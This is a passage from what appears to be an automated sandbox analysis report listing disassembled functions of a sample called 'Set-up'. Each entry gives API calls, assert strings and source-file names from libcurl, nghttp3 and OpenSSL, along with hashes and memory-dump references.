String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: b489be85f5c900206cde57b2e8f6edba944439cdeda1a934e7f76c8c0b1db895
Instruction ID: 5240553305c29b947aa63cea70e2b05b7f489ce449def18597941f2fa616b3e8
Opcode Fuzzy Hash: b489be85f5c900206cde57b2e8f6edba944439cdeda1a934e7f76c8c0b1db895
Instruction Fuzzy Hash: 2C014CB1B4831076E2347265BC03F6F2769DFD6B14F380538F648AA1C3E5D9689562B2

Function 00B0E600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00FBE17C,nghttp3_qpack.c,00000811,?,?), ref: 00B0E866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,00B1077F,?,?,00000000,00000000), ref: 00B0E87B

Strings

space <= ctx->max_dtable_capacity, xrefs: 00B0E876
nghttp3_qpack.c, xrefs: 00B0E85C, 00B0E871

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: 0356854b8add3aff261cc51717599c0d589c83c5021a951d74fb07658a4a8dd1
Instruction ID: 9f39e183c2bd17a91d977cb5aa8fb1afc7c05edcd0fb9a6f172701ebb5a48206
Opcode Fuzzy Hash: 0356854b8add3aff261cc51717599c0d589c83c5021a951d74fb07658a4a8dd1
Instruction Fuzzy Hash: A881B6B5A007019FD710DF24D842A26BBF5FF59314F088A6CE88A87792EB31F955CB91

Function 00B18350 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00B183AD
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 00B183C5

Part of subcall function 00B277B0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00FC4C2D,00000000,00000000,?,?,?,00B29882,?,00000000), ref: 00B277DD
Part of subcall function 00B277B0: fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00B277F0
Part of subcall function 00B277B0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00B27802

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00B1853F

Strings

HOSTALIASES, xrefs: 00B183C0

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _stricmpfclosefopenfseekgetenvstrchr
String ID: HOSTALIASES
API String ID: 1675145106-255135673
Opcode ID: 0cb452524c344afc1824acd4d058c3999b624cb05483efd04e268e8ff14ca2c2
Instruction ID: 2ed38c04c7b98d4749ae4e4b64456a189478aa330ddece861556f9f233b69a98
Opcode Fuzzy Hash: 0cb452524c344afc1824acd4d058c3999b624cb05483efd04e268e8ff14ca2c2
Instruction Fuzzy Hash: 7951D4A1D0838297E720DB21AD417BB73D8AFA5348F40992CFD8C85252FF75D6D48B52

Function 00A681B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00A654E6), ref: 00A68235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 00A682D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 00A682E1

Strings

mime.c, xrefs: 00A6824C, 00A682B8, 00A6832D, 00A68342, 00A6835E, 00A6837A, 00A6839C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: 2113d4ce29c3df35f1b1d8aeccba374e35707cb88d8d12562b98512197855f03
Instruction ID: 9532e5eaa7f7ea45ae2a03dab33f19b00f936909bec1c20a7c266969795085de
Opcode Fuzzy Hash: 2113d4ce29c3df35f1b1d8aeccba374e35707cb88d8d12562b98512197855f03
Instruction Fuzzy Hash: 0251A2B1A547009BEB109F24DD9676B3AB8AF40B14F040268FC589F3C6EBB9D9149792

Function 00AA4380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 00AA43D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AA4409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00AA4457

Strings

curl_addrinfo.c, xrefs: 00AA4429, 00AA44C3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: a395774d92dbe5fd0d4bfd0256d736060bfd106845dbc6e3fb0c3600441cd947
Instruction ID: a52b0d8ce80d5acc8a804ae57eb850770b374cd2076f61fb694037decb48662c
Opcode Fuzzy Hash: a395774d92dbe5fd0d4bfd0256d736060bfd106845dbc6e3fb0c3600441cd947
Instruction Fuzzy Hash: C3418AB5A04705AFD7009F55C481A2AB7E4FF88314F04892AFD898B291E370E950DBA1

Function 00A96650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00A9665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A9670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 00A9671C

Strings

altsvc.c, xrefs: 00A96699, 00A966AB, 00A966BD

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: c0e149306e92bf12e89616e9ace2010d1321082bffb22e361ac03f28e2045d7e
Instruction ID: 62d3182f5fcd16547d1b49378d132a59bcfa51ec0b98b665576cb8685b3f553c
Opcode Fuzzy Hash: c0e149306e92bf12e89616e9ace2010d1321082bffb22e361ac03f28e2045d7e
Instruction Fuzzy Hash: 8031C4F1B183006BDB10AF64AD82A2F77F4AF94758F044438FE0D9A242F675ED44C6A2

Function 00B042E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00B0435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 00B043EF

Strings

nghttp3_conn.c, xrefs: 00B04355, 00B043E5
tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00B0435A, 00B043EA

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 7be0b9d3330e1f175876dc368a3f5a995e159c839b579eb071d2b8db6c46c283
Instruction ID: 3d32b622b768a007ed663eab3852b004fb7dcde967225c799aa4f06970186dde
Opcode Fuzzy Hash: 7be0b9d3330e1f175876dc368a3f5a995e159c839b579eb071d2b8db6c46c283
Instruction Fuzzy Hash: E531B472500205AFD7119F54EC0AFDA3BE9EF85319F0904F4EA049B1A3E772E928C7A5

Function 00B0A090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,00B070DF,00000001,?,?,?), ref: 00B0A0E5

Part of subcall function 00B0A140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00B0A29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,00B070DF,00000001,?,?,?), ref: 00B0A135

Strings

nghttp3_ksl.c, xrefs: 00B0A12B
ksl->head, xrefs: 00B0A130

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: 58e793d7afa27151e41d0c32a8039b0f5dd68ebcf9fba4676c56aee14a05e7a3
Instruction ID: a63a3f1a9fcf8c26fec2523f679a0011773520c8863b69df99fa0ca502dadef1
Opcode Fuzzy Hash: 58e793d7afa27151e41d0c32a8039b0f5dd68ebcf9fba4676c56aee14a05e7a3
Instruction Fuzzy Hash: DD1190702003049FDB149F04D98196AFFE6FF8A314F18C99EE9499B686D334EC41DBA2

Function 00A988C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00A9893B
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00A98960

Part of subcall function 00A87620: GetModuleHandleA.KERNEL32(ntdll), ref: 00A8763F
Part of subcall function 00A87620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00A8764B
Part of subcall function 00A87620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00A87695
Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 00A876D3
Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 00A876DA
Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 00A876E4
Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00A876EB
Part of subcall function 00A87620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 00A876FC

Strings

@, xrefs: 00A988C4
@, xrefs: 00A98945

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
String ID: @$ @
API String ID: 2103437208-1089145642
Opcode ID: 2da17c09d79a193074a9a2da5ca6a228c2152b0ba43cfd22af70d4105d4b13ac
Instruction ID: 9fd72eabd53b147e41321da7ce7ca27bc3b83e4cc6b5779fe2f57c0f3573c920
Opcode Fuzzy Hash: 2da17c09d79a193074a9a2da5ca6a228c2152b0ba43cfd22af70d4105d4b13ac
Instruction Fuzzy Hash: 48019BB050434257EB109F14F94A77A77D4AF82714F014418F9C45B2C5E7B9CAC8C743

Function 00A8C5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00A8C685

Part of subcall function 00A673F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00A6CA95,00F9CA98,00000467,mprintf.c), ref: 00A6741D
Part of subcall function 00A673F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00A67445

Part of subcall function 00A673F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00A6CA95,00F9CA98,00000467,mprintf.c), ref: 00A67486
Part of subcall function 00A673F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00A674AA
Part of subcall function 00A673F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A674B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00A8C6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 00A8C719

Strings

vtls/vtls.c, xrefs: 00A8C653, 00A8C69D, 00A8C6E7, 00A8C72E, 00A8C756, 00A8C77F, 00A8C7A8, 00A8C7D1, 00A8C7FA, 00A8C823, 00A8C84C, 00A8C875, 00A8C935, 00A8C95F

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
Opcode ID: 7753f4a06bad55c49077a04eed9ce8eb5a493c3465aa801158bc884cc81bdf42
Instruction ID: d2ea8a0c8cb0eb37f736bbade7598d1808b6928e3496bbf9ca1bf51d48cf0695
Opcode Fuzzy Hash: 7753f4a06bad55c49077a04eed9ce8eb5a493c3465aa801158bc884cc81bdf42
Instruction Fuzzy Hash: 78A17EB0B40B029BD720DF2AD985B12B7E8BF04754F084579E948CB682FB75E9509FA0

Function 00BEE720 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 00BEE9A3

Strings

crypto/bn/bn_shift.c, xrefs: 00BEE7E9
BN_lshift, xrefs: 00BEE7E2
, xrefs: 00BEE992

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset
String ID: $BN_lshift$crypto/bn/bn_shift.c
API String ID: 2221118986-2228461501
Opcode ID: bfafef82e7ed67db5d479bc88d681fbdc706694eb4e54b3c8ec8b1d761f5fe34
Instruction ID: 195958d8be585fa90b3febb598819aaa1a3ca0ffdd8be93a9272267de977ec07
Opcode Fuzzy Hash: bfafef82e7ed67db5d479bc88d681fbdc706694eb4e54b3c8ec8b1d761f5fe34
Instruction Fuzzy Hash: BF71DA75A087149BC715DF2AC88062AF7E1AFDA700F148B2EF9A967392D770EC01CB41

Function 00C64870 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 179stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00C105BF,00000000,00000000,input), ref: 00C64986
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 00C649D4

Strings

ossl_property_string, xrefs: 00C6491C, 00C6494F
crypto/property/property_string.c, xrefs: 00C64926, 00C64959, 00C6499A, 00C649F3, 00C64A4D, 00C64A72

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
